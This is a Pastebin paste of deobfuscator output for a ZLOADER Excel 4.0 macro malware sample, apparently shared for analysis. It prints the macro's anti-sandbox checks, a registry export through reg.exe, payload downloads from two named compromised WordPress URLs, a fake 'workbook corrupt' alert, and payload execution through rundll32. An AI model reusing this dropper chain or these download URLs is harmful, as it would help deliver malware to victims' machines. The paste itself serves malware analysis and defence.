API tools faq
paste
dissectmalware

ZLOADER XLM Macro - deobfuscated

dissectmalware
May 20th, 2020
598
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.37 KB | None | 0 0
raw download clone embed print report
  1. Deobfuscated by: https://github.com/DissectMalware/XLMMacroDeobfuscator
  2. sample: hhttps://app.any.run/tasks/1a656e9a-0f6b-4a37-a9a2-4ead15ec7a89/
  3. ref: https://twitter.com/James_inthe_box/status/1263142837933051904
  4.  
  5. [Loading Cells]
  6. auto_open: auto_open->Sheet2!$EZ$16757
  7. [Starting Deobfuscation]
  8. CELL:EZ16757 , FullEvaluation ,SET.VALUE(Sheet2!DX23839,"-350")
  9. CELL:EZ16758 , FullEvaluation ,GOTO(DS11877)
  10. CELL:DS11877 , FullEvaluation ,SET.VALUE(Sheet2!IM32690,"428")
  11. CELL:DS11878 , FullEvaluation ,GOTO(EL33549)
  12. CELL:EL33549 , FullEvaluation ,SET.VALUE(Sheet2!AD4689,"-464")
  13. CELL:EL33550 , FullEvaluation ,RUN(Sheet2!GZ2517)
  14. CELL:GZ2517 , FullEvaluation ,SET.VALUE(Sheet2!FC50404,"337")
  15. CELL:GZ2518 , FullEvaluation ,GOTO(W23611)
  16. CELL:W23611 , FullEvaluation ,SET.VALUE(Sheet2!DN10383,"607.6")
  17. CELL:W23612 , FullEvaluation ,RUN(Sheet2!EK22601)
  18. CELL:EK22601 , FullEvaluation ,SET.VALUE(Sheet2!HM37381,"-302")
  19. CELL:EK22602 , FullEvaluation ,GOTO(AR7263)
  20. CELL:AR7263 , FullEvaluation ,SET.VALUE(Sheet2!R5879,"-537.9")
  21. CELL:AR7264 , FullEvaluation ,GOTO(DG33187)
  22. CELL:DG33187 , FullEvaluation ,SET.VALUE(Sheet2!IH47316,"-294")
  23. CELL:DG33188 , FullEvaluation ,RUN(Sheet2!DV6231)
  24. CELL:DV6231 , FullEvaluation ,SET.VALUE(Sheet2!DM40865,"502")
  25. CELL:DV6232 , FullEvaluation ,RUN(Sheet2!IR65325)
  26. CELL:IR65325 , FullEvaluation ,SET.VALUE(Sheet2!DD28646,"308")
  27. CELL:IR65326 , FullEvaluation ,RUN(Sheet2!AN52075)
  28. CELL:AN52075 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Sheet2!AU28892)
  29. CELL:AN52076 , FullEvaluation ,RUN(Sheet2!CD27825)
  30. CELL:CD27825 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Sheet2!CD27826)
  31. CELL:CD27826 , NotImplemented ,APP.MAXIMIZE()
  32. CELL:CD27827 , FullEvaluation ,RUN(Sheet2!BE21756)
  33. CELL:BE21756 , FullEvaluation ,FORMULA.FILL("=IF(GET.WINDOW(7),GOTO(R[7135]C[-10]),)",Sheet2!BE21757)
  34. CELL:BE21757 , FullEvaluation ,IF(GET.WINDOW(7),GOTO(R[7135]C[-10]),)
  35. CELL:BE21758 , FullEvaluation , RUN(Sheet2!CJ51431)
  36. CELL:CJ51431 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(20),,GOTO(R[-22540]C[-41]))",Sheet2!CJ51432)
  37. CELL:CJ51432 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-22540]C[-41]))
  38. CELL:CJ51433 , FullEvaluation , RUN(Sheet2!EK53289)
  39. CELL:EK53289 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(23)<3,GOTO(R[-24398]C[-94]),)",Sheet2!EK53290)
  40. CELL:EK53290 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-24398]C[-94]),)
  41. CELL:EK53291 , FullEvaluation , RUN(Sheet2!DE53091)
  42. CELL:DE53091 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(31),GOTO(R[-24200]C[-62]),)",Sheet2!DE53092)
  43. CELL:DE53092 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[-24200]C[-62]),)
  44. CELL:DE53093 , FullEvaluation , GOTO(BD7678)
  45. CELL:BD7678 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,GOTO(R[21213]C[-9]),)",Sheet2!BD7679)
  46. CELL:BD7679 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[21213]C[-9]),)
  47. CELL:BD7679 , FullEvaluation , [TRUE] GOTO(R[21213]C[-9])
  48. CELL:AU28892 , End , CLOSE(FALSE)
  49. CELL:BD7679 , FullEvaluation , [FALSE]
  50. CELL:BD7680 , FullEvaluation , RUN(Sheet2!T27711)
  51. CELL:T27711 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,GOTO(R[1180]C[27]),)",Sheet2!T27712)
  52. CELL:T27712 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[1180]C[27]),)
  53. CELL:T27712 , FullEvaluation , [TRUE] GOTO(R[1180]C[27])
  54. CELL:AU28892 , End , CLOSE(FALSE)
  55. CELL:T27712 , FullEvaluation , [FALSE]
  56. CELL:T27713 , FullEvaluation , RUN(Sheet2!DQ22708)
  57. CELL:DQ22708 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(19),,GOTO(R[6183]C[-74]))",Sheet2!DQ22709)
  58. CELL:DQ22709 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[6183]C[-74]))
  59. CELL:DQ22710 , FullEvaluation , RUN(Sheet2!GE18364)
  60. CELL:GE18364 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(42),,GOTO(R[10527]C[-140]))",Sheet2!GE18365)
  61. CELL:GE18365 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[10527]C[-140]))
  62. CELL:GE18366 , FullEvaluation , GOTO(GC2028)
  63. CELL:GC2028 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[26863]C[-138]))",Sheet2!GC2029)
  64. CELL:GC2029 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[26863]C[-138]))
  65. CELL:GC2030 , FullEvaluation , RUN(Sheet2!CE49383)
  66. CELL:CE49383 , FullEvaluation , FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!AD52416)
  67. CELL:CE49384 , FullEvaluation , GOTO(FY17312)
  68. CELL:FY17312 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\F31yq.reg""",Sheet2!FC42899)
  69. CELL:FY17313 , FullEvaluation , GOTO(O52519)
  70. CELL:O52519 , FullEvaluation , FORMULA.FILL("=R[7387]C[-141]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-2130]C[-12]&"" /y""",Sheet2!FO45029)
  71. CELL:O52520 , FullEvaluation , GOTO(I2849)
  72. CELL:I2849 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Sheet2!A56)
  73. CELL:I2850 , FullEvaluation , RUN(Sheet2!AB43815)
  74. CELL:AB43815 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-43760]C[-27],R[1213]C[143],0,5)",Sheet2!AB43816)
  75. CELL:AB43816 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",51203GET.WORKSPACE(2)\Excel\Security P41686 /y,0,5)
  76. CELL:AB43817 , FullEvaluation , RUN(Sheet2!GZ65252)
  77. CELL:GZ65252 , FullEvaluation , FORMULA.FILL("=WHILE(ISERROR(FILES(R[-22356]C[-49])))",Sheet2!GZ65255)
  78. CELL:GZ65253 , FullEvaluation , FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Sheet2!GZ65256)
  79. CELL:GZ65254 , FullEvaluation , FORMULA.FILL("=NEXT()",Sheet2!GZ65257)
  80. CELL:GZ65255 , PartialEvaluation , WHILE("C:\Users\Public\F31yq.reg")
  81. CELL:GZ65256 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  82. CELL:GZ65257 , PartialEvaluation , NEXT()
  83. CELL:GZ65258 , FullEvaluation , RUN(Sheet2!S45310)
  84. CELL:S45310 , FullEvaluation , FORMULA.FILL("=FOPEN(R[-2412]C[140])",Sheet2!S45311)
  85. CELL:S45311 , PartialEvaluation , FOPEN("C:\Users\Public\F31yq.reg")
  86. CELL:S45312 , FullEvaluation , RUN(Sheet2!DG13084)
  87. CELL:DG13084 , FullEvaluation , FORMULA.FILL("=FPOS(R[32226]C[-92],215)",Sheet2!DG13085)
  88. CELL:DG13085 , PartialEvaluation , FPOS("""C:\Users\Public\F31yq.reg""",215)
  89. CELL:DG13086 , FullEvaluation , RUN(Sheet2!AM24582)
  90. CELL:AM24582 , FullEvaluation , FORMULA.FILL("=FREAD(R[20728]C[-20],255)",Sheet2!AM24583)
  91. CELL:AM24583 , PartialEvaluation , FREAD("""C:\Users\Public\F31yq.reg""",255)
  92. CELL:AM24584 , FullEvaluation , RUN(Sheet2!EZ32599)
  93. CELL:EZ32599 , FullEvaluation , FORMULA.FILL("=FCLOSE(R[12711]C[-137])",Sheet2!EZ32600)
  94. CELL:EZ32600 , PartialEvaluation , FCLOSE("""C:\Users\Public\F31yq.reg""")
  95. CELL:EZ32601 , FullEvaluation , RUN(Sheet2!IS8766)
  96. CELL:IS8766 , FullEvaluation , FORMULA.FILL("=FILE.DELETE(R[34132]C[-94])",Sheet2!IS8767)
  97. CELL:IS8767 , NotImplemented , FILE.DELETE(R[34132]C[-94])
  98. CELL:IS8768 , FullEvaluation , GOTO(Y20249)
  99. CELL:Y20249 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[4333]C[14])),GOTO(R[8642]C[22]),)",Sheet2!Y20250)
  100. CELL:Y20250 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[4333]C[14])),GOTO(R[8642]C[22]),)
  101. CELL:Y20251 , FullEvaluation , GOTO(DW46971)
  102. CELL:DW46971 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\278C.html""",Sheet2!EF25999)
  103. CELL:DW46972 , FullEvaluation , GOTO(AQ10543)
  104. CELL:AQ10543 , FullEvaluation , FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!BI8351)
  105. CELL:AQ10544 , FullEvaluation , RUN(Sheet2!DA40956)
  106. CELL:DA40956 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-32606]C[-44],R[-14958]C[31],0,0)",Sheet2!DA40957)
  107. CELL:DA40957 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\278C.html",0,0)
  108. CELL:DA40958 , FullEvaluation , RUN(Sheet2!AB30737)
  109. CELL:AB30737 , FullEvaluation , FORMULA.FILL("=FILES(R[-4739]C[108])",Sheet2!AB30738)
  110. CELL:AB30738 , PartialEvaluation , FILES("C:\Users\Public\278C.html")
  111. CELL:AB30739 , FullEvaluation , GOTO(DH602)
  112. CELL:DH602 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[30135]C[-84]),GOTO(R[28289]C[-65]),)",Sheet2!DH603)
  113. CELL:DH603 , FullBranching , IF(ISERROR(R[30135]C[-84]),GOTO(R[28289]C[-65]),)
  114. CELL:DH603 , FullEvaluation , [TRUE] GOTO(R[28289]C[-65])
  115. CELL:AU28892 , End , CLOSE(FALSE)
  116. CELL:DH603 , FullEvaluation , [FALSE]
  117. CELL:DH604 , FullEvaluation , RUN(Sheet2!DP56466)
  118. CELL:DP56466 , FullEvaluation , SET.VALUE(Sheet2!IT55124,"-1227.5")
  119. CELL:DP56467 , FullEvaluation , GOTO(FZ46015)
  120. CELL:FZ46015 , FullEvaluation , SET.VALUE(Sheet2!BK30990,"219")
  121. CELL:FZ46016 , FullEvaluation , RUN(Sheet2!CZ42664)
  122. CELL:CZ42664 , FullEvaluation , SET.VALUE(Sheet2!HU62740,"-179")
  123. CELL:CZ42665 , FullEvaluation , GOTO(Z43104)
  124. CELL:Z43104 , FullEvaluation , SET.VALUE(Sheet2!AQ37789,"-231")
  125. CELL:Z43105 , FullEvaluation , GOTO(AB63111)
  126. CELL:AB63111 , FullEvaluation , SET.VALUE(Sheet2!AM30833,"-167")
  127. CELL:AB63112 , FullEvaluation , GOTO(HT6285)
  128. CELL:HT6285 , FullEvaluation , SET.VALUE(Sheet2!AB59905,"97.4")
  129. CELL:HT6286 , FullEvaluation , RUN(Sheet2!AL38908)
  130. CELL:AL38908 , FullEvaluation , SET.VALUE(Sheet2!EC58448,"-6.75")
  131. CELL:AL38909 , FullEvaluation , RUN(Sheet2!HE24233)
  132. CELL:HE24233 , FullEvaluation , SET.VALUE(Sheet2!ET17871,"426")
  133. CELL:HE24234 , FullEvaluation , GOTO(CM31379)
  134. CELL:CM31379 , FullEvaluation , SET.VALUE(Sheet2!AV38726,"-330")
  135. CELL:CM31380 , FullEvaluation , RUN(Sheet2!DP40784)
  136. CELL:DP40784 , FullEvaluation , SET.VALUE(Sheet2!IQ39844,"176")
  137. CELL:DP40785 , FullEvaluation , GOTO(GZ65311)
  138. CELL:GZ65311 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\vpySLQ4.html""",Sheet2!FA20689)
  139. CELL:GZ65312 , FullEvaluation , GOTO(V55549)
  140. CELL:V55549 , FullEvaluation , FORMULA.FILL("=""http://linguy.cn/wp-content/plugins/apikey/wp-front.php""",Sheet2!EH27066)
  141. CELL:V55550 , FullEvaluation , RUN(Sheet2!EJ44674)
  142. CELL:EJ44674 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-34611]C[-3],R[-40988]C[16],0,0)",Sheet2!EK61677)
  143. CELL:EJ44675 , FullEvaluation , GOTO(EE53119)
  144. CELL:EE53119 , FullEvaluation , FORMULA.FILL("=FILES(R[-9924]C[-91])",Sheet2!IN30613)
  145. CELL:EE53120 , FullEvaluation , RUN(Sheet2!CX11460)
  146. CELL:CX11460 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[25175]C[173]),,RUN(R[3160]C[32]))",Sheet2!BW5438)
  147. CELL:CX11461 , FullEvaluation , GOTO(BD32544)
  148. CELL:BD32544 , FullEvaluation , FORMULA.FILL("=""https://esvconnects.com/wp-content/plugins/apikey/wp-front.php""",Sheet2!FK56594)
  149. CELL:BD32545 , FullEvaluation , GOTO(ID25477)
  150. CELL:ID25477 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[52036]C[156],R[16131]C[146],0,0)",Sheet2!K4558)
  151. CELL:ID25478 , FullEvaluation , RUN(Sheet2!S36752)
  152. CELL:S36752 , FullEvaluation , FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!AX33696)
  153. CELL:S36753 , FullEvaluation , GOTO(FS35376)
  154. CELL:FS35376 , FullEvaluation , FORMULA.FILL("=ALERT(R[25098]C[-57])",Sheet2!DC8598)
  155. CELL:FS35377 , FullEvaluation , RUN(Sheet2!FI43724)
  156. CELL:FI43724 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",Sheet2!HB36462)
  157. CELL:FI43725 , FullEvaluation , RUN(Sheet2!DF63884)
  158. CELL:DF63884 , FullEvaluation , FORMULA.FILL("=R[5628]C[-60]&"",DllRegisterServer""",Sheet2!HI15061)
  159. CELL:DF63885 , FullEvaluation , RUN(Sheet2!AS18031)
  160. CELL:AS18031 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-11962]C[6],R[-33363]C[13],0,5)",Sheet2!GV48424)
  161. CELL:AS18032 , FullEvaluation , RUN(Sheet2!EK61677)
  162. CELL:EK61677 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://linguy.cn/wp-content/plugins/apikey/wp-front.php","C:\Users\Public\vpySLQ4.html",0,0)
  163. CELL:EK61678 , FullEvaluation , RUN(Sheet2!IN30613)
  164. CELL:IN30613 , PartialEvaluation , FILES("C:\Users\Public\vpySLQ4.html")
  165. CELL:IN30614 , FullEvaluation , GOTO(BW5438)
  166. CELL:BW5438 , FullBranching , IF(ISERROR(R[25175]C[173]),,RUN(R[3160]C[32]))
  167. CELL:BW5438 , FullEvaluation , [TRUE]
  168. CELL:BW5439 , FullEvaluation , RUN(Sheet2!FK56594)
  169. CELL:FK56594 , FullEvaluation , "https://esvconnects.com/wp-content/plugins/apikey/wp-front.php"
  170. CELL:FK56595 , FullEvaluation , GOTO(K4558)
  171. CELL:K4558 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://esvconnects.com/wp-content/plugins/apikey/wp-front.php""","C:\Users\Public\vpySLQ4.html",0,0)
  172. CELL:K4559 , FullEvaluation , GOTO(AX33696)
  173. CELL:AX33696 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  174. CELL:AX33697 , FullEvaluation , RUN(Sheet2!DC8598)
  175. CELL:DC8598 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  176. CELL:DC8599 , FullEvaluation , RUN(Sheet2!HB36462)
  177. CELL:HB36462 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  178. CELL:HB36463 , FullEvaluation , GOTO(HI15061)
  179. CELL:HI15061 , FullEvaluation , C:\Users\Public\vpySLQ4.html,DllRegisterServer
  180. CELL:HI15062 , FullEvaluation , RUN(Sheet2!GV48424)
  181. CELL:GV48424 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\vpySLQ4.html,DllRegisterServer",0,5)
  182. CELL:GV48425 , FullEvaluation , GOTO(AU28892)
  183. CELL:AU28892 , End , CLOSE(FALSE)
  184. CELL:BW5438 , FullEvaluation , [FALSE] RUN(Sheet2!DC8598)
  185. CELL:DC8598 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  186. CELL:DC8599 , FullEvaluation , RUN(Sheet2!HB36462)
  187. CELL:HB36462 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  188. CELL:HB36463 , FullEvaluation , GOTO(HI15061)
  189. CELL:HI15061 , FullEvaluation , C:\Users\Public\vpySLQ4.html,DllRegisterServer
  190. CELL:HI15062 , FullEvaluation , RUN(Sheet2!GV48424)
  191. CELL:GV48424 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\vpySLQ4.html,DllRegisterServer",0,5)
  192. CELL:GV48425 , FullEvaluation , GOTO(AU28892)
  193. CELL:AU28892 , End , CLOSE(FALSE)
  194. time elapsed: 6.313699722290039
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!